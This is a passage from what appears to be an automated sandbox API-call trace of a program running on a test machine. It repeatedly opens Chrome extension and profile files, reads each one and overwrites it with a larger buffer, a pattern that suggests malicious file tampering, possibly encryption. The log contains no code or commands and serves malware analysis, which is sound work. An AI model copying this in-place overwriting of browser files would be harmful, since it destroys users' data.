lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1d6 [0138.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.012] ReleaseMutex (hMutex=0x168) returned 1 [0138.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Current Session", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0138.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Current Session", cchWideChar=15, lpMultiByteStr=0x1f735ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Current Session", lpUsedDefaultChar=0x0) returned 15 [0138.013] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d6, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1d6, lpOverlapped=0x0) returned 1 [0138.014] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.014] WriteFile (in: hFile=0x1cc, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x345f2d0*=0x75e, lpOverlapped=0x0) returned 1 [0138.014] CloseHandle (hObject=0x1cc) returned 1 [0138.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x10 [0138.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.016] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.017] ReleaseMutex (hMutex=0x168) returned 1 [0138.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CURRENT", lpUsedDefaultChar=0x0) returned 7 [0138.017] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f73468, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f73468*, lpNumberOfBytesRead=0x345f2bc*=0x10, lpOverlapped=0x0) returned 1 [0138.018] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.018] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x598, lpOverlapped=0x0) returned 1 [0138.018] CloseHandle (hObject=0x1cc) returned 1 [0138.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.020] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.020] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x101 [0138.020] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.020] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.021] ReleaseMutex (hMutex=0x168) returned 1 [0138.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.021] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eeb418, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb418*, lpNumberOfBytesRead=0x345f2bc*=0x101, lpOverlapped=0x0) returned 1 [0138.022] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.022] WriteFile (in: hFile=0x1cc, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x689, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x345f2d0*=0x689, lpOverlapped=0x0) returned 1 [0138.022] CloseHandle (hObject=0x1cc) returned 1 [0138.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.023] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.023] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd7 [0138.023] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.023] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.023] ReleaseMutex (hMutex=0x168) returned 1 [0138.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.023] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xd7, lpOverlapped=0x0) returned 1 [0138.024] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.024] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x65f, lpOverlapped=0x0) returned 1 [0138.024] CloseHandle (hObject=0x1cc) returned 1 [0138.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.025] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.025] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x123 [0138.025] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.026] ReleaseMutex (hMutex=0x168) returned 1 [0138.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.026] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec8d58, nNumberOfBytesToRead=0x123, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec8d58*, lpNumberOfBytesRead=0x345f2bc*=0x123, lpOverlapped=0x0) returned 1 [0138.027] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.028] WriteFile (in: hFile=0x1cc, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x6ab, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x345f2d0*=0x6ab, lpOverlapped=0x0) returned 1 [0138.028] CloseHandle (hObject=0x1cc) returned 1 [0138.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.029] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.029] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd2 [0138.029] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.029] ReleaseMutex (hMutex=0x168) returned 1 [0138.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.029] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x345f2bc*=0xd2, lpOverlapped=0x0) returned 1 [0138.030] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.030] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x65a, lpOverlapped=0x0) returned 1 [0138.031] CloseHandle (hObject=0x1cc) returned 1 [0138.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.032] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.032] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe3 [0138.032] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.032] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.032] ReleaseMutex (hMutex=0x168) returned 1 [0138.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.032] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xe3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xe3, lpOverlapped=0x0) returned 1 [0138.033] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.033] WriteFile (in: hFile=0x1cc, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x66b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x345f2d0*=0x66b, lpOverlapped=0x0) returned 1 [0138.034] CloseHandle (hObject=0x1cc) returned 1 [0138.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.034] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.035] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd7 [0138.035] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.035] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.035] ReleaseMutex (hMutex=0x168) returned 1 [0138.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.035] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c54f8, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c54f8*, lpNumberOfBytesRead=0x345f2bc*=0xd7, lpOverlapped=0x0) returned 1 [0138.036] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.037] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x65f, lpOverlapped=0x0) returned 1 [0138.037] CloseHandle (hObject=0x1cc) returned 1 [0138.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.038] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.038] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2d5 [0138.038] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.038] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.038] ReleaseMutex (hMutex=0x168) returned 1 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0138.039] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3e88, nNumberOfBytesToRead=0x2d5, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3e88*, lpNumberOfBytesRead=0x345f2bc*=0x2d5, lpOverlapped=0x0) returned 1 [0138.125] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.125] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x85d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x345f2d0*=0x85d, lpOverlapped=0x0) returned 1 [0138.126] CloseHandle (hObject=0x1cc) returned 1 [0138.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.129] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd0 [0138.130] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.130] ReleaseMutex (hMutex=0x168) returned 1 [0138.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0138.130] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x345f2bc*=0xd0, lpOverlapped=0x0) returned 1 [0138.132] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0138.132] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x658, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x345f2d0*=0x658, lpOverlapped=0x0) returned 1 [0138.132] CloseHandle (hObject=0x1cc) returned 1 [0138.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.134] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.134] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xdd [0138.134] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.134] 